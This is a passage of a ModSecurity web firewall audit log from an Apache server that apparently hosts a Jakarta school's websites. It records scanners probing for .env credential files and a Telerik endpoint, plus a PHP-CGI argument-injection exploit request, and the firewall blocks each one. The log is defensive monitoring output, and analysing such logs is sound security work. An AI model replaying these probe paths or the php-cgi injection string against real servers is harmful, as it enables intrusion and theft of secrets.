3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747131560968917 822 (- - -) Stopwatch2: 1747131560968917 822; combined=404, p1=361, p2=0, p3=0, p4=0, p5=42, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79006a6f-Z-- --419d0461-A-- [13/May/2025:17:39:38 +0700] aCMhauO55leZpQyxFsZFwgAAAIM 103.236.140.4 43704 103.236.140.4 8181 --419d0461-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 Accept-Charset: utf-8 --419d0461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --419d0461-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747132778930626 878 (- - -) Stopwatch2: 1747132778930626 878; combined=315, p1=275, p2=0, p3=0, p4=0, p5=39, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --419d0461-Z-- --7b9bc20f-A-- [13/May/2025:20:53:01 +0700] aCNOvY3mg5f2L4Eof6MLswAAAMY 103.236.140.4 46734 103.236.140.4 8181 --7b9bc20f-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --7b9bc20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9bc20f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747144381728739 769 (- - -) Stopwatch2: 1747144381728739 769; combined=296, p1=250, p2=0, p3=0, p4=0, p5=46, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9bc20f-Z-- --bd1ea228-A-- [13/May/2025:23:21:38 +0700] aCNxkq50YiewH3i7i4fjyQAAABY 103.236.140.4 44628 103.236.140.4 8181 --bd1ea228-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --bd1ea228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1ea228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747153298093947 887 (- - -) Stopwatch2: 1747153298093947 887; combined=337, p1=297, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1ea228-Z-- --4a625162-A-- [13/May/2025:23:49:56 +0700] aCN4NK50YiewH3i7i4fj3wAAAAQ 103.236.140.4 44840 103.236.140.4 8181 --4a625162-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a625162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a625162-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996554843 13657 (- - -) Stopwatch2: 1747154996554843 13657; combined=25893, p1=326, p2=0, p3=0, p4=0, p5=12803, sr=113, sw=0, l=0, gc=12764 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a625162-Z-- --971cec4e-A-- [13/May/2025:23:49:56 +0700] aCN4NK50YiewH3i7i4fj4AAAABg 103.236.140.4 44844 103.236.140.4 8181 --971cec4e-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --971cec4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --971cec4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996666932 780 (- - -) Stopwatch2: 1747154996666932 780; combined=350, p1=316, p2=0, p3=0, p4=0, p5=34, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --971cec4e-Z-- --aa2d130a-A-- [13/May/2025:23:49:56 +0700] aCN4NI_RcapTWo3LoyeWYAAAAEU 103.236.140.4 44848 103.236.140.4 8181 --aa2d130a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --aa2d130a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa2d130a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996998511 807 (- - -) Stopwatch2: 1747154996998511 807; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa2d130a-Z-- --72f9fc59-A-- [14/May/2025:00:12:33 +0700] aCN9gY3mg5f2L4Eof6MR2QAAAMk 103.236.140.4 44950 103.236.140.4 8181 --72f9fc59-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --72f9fc59-C-- --72f9fc59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f9fc59-E-- --72f9fc59-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747156353175892 4306 (- - -) Stopwatch2: 1747156353175892 4306; combined=2334, p1=531, p2=1759, p3=0, p4=0, p5=43, sr=82, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f9fc59-Z-- --87499b78-A-- [14/May/2025:02:23:52 +0700] aCOcSOO55leZpQyxFsZMmwAAAIw 103.236.140.4 46236 103.236.140.4 8181 --87499b78-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.226.196.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.226.196.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --87499b78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87499b78-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747164232980773 2939 (- - -) Stopwatch2: 1747164232980773 2939; combined=1191, p1=449, p2=710, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87499b78-Z-- --3a788d4b-A-- [14/May/2025:02:24:29 +0700] aCOcbeO55leZpQyxFsZMoAAAAIM 103.236.140.4 46250 103.236.140.4 8181 --3a788d4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --3a788d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a788d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747164269657878 679 (- - -) Stopwatch2: 1747164269657878 679; combined=263, p1=236, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a788d4b-Z-- --b6387650-A-- [14/May/2025:04:10:23 +0700] aCO1P8OlTOX2TmGW6__ucwAAANg 103.236.140.4 48724 103.236.140.4 8181 --b6387650-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Accept-Charset: utf-8 --b6387650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6387650-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747170623840553 851 (- - -) Stopwatch2: 1747170623840553 851; combined=339, p1=297, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6387650-Z-- --68fbf969-A-- [14/May/2025:04:46:47 +0700] aCO9x8OlTOX2TmGW6__uqQAAANM 103.236.140.4 48870 103.236.140.4 8181 --68fbf969-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875069 --68fbf969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --68fbf969-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807289283 452 (- - -) Stopwatch2: 1747172807289283 452; combined=199, p1=178, p2=0, p3=0, p4=0, p5=21, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68fbf969-Z-- --9be27979-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtaQAAAA8 103.236.140.4 48928 103.236.140.4 8181 --9be27979-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274687 --9be27979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9be27979-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807487347 878 (- - -) Stopwatch2: 1747172807487347 878; combined=348, p1=315, p2=0, p3=0, p4=0, p5=33, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be27979-Z-- --ba68db69-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtagAAABE 103.236.140.4 48932 103.236.140.4 8181 --ba68db69-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875072 --ba68db69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba68db69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807684785 721 (- - -) Stopwatch2: 1747172807684785 721; combined=259, p1=228, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba68db69-Z-- --3d0dcc0c-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtawAAABM 103.236.140.4 48936 103.236.140.4 8181 --3d0dcc0c-B-- GET /code/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274690 --3d0dcc0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d0dcc0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807882319 715 (- - -) Stopwatch2: 1747172807882319 715; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0dcc0c-Z-- --8e35e814-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbAAAABU 103.236.140.4 48940 103.236.140.4 8181 --8e35e814-B-- GET /db/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875075 --8e35e814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8e35e814-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808080473 658 (- - -) Stopwatch2: 1747172808080473 658; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e35e814-Z-- --2670f07c-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbQAAABc 103.236.140.4 48944 103.236.140.4 8181 --2670f07c-B-- GET /login/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274693 --2670f07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2670f07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808278464 722 (- - -) Stopwatch2: 1747172808278464 722; combined=260, p1=217, p2=0, p3=0, p4=0, p5=43, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2670f07c-Z-- --81077653-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbgAAAAA 103.236.140.4 48948 103.236.140.4 8181 --81077653-B-- GET /api_v1/go/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875078 --81077653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81077653-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808477039 701 (- - -) Stopwatch2: 1747172808477039 701; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81077653-Z-- --3c9ffe2d-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbwAAAAQ 103.236.140.4 48952 103.236.140.4 8181 --3c9ffe2d-B-- GET /api_v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; 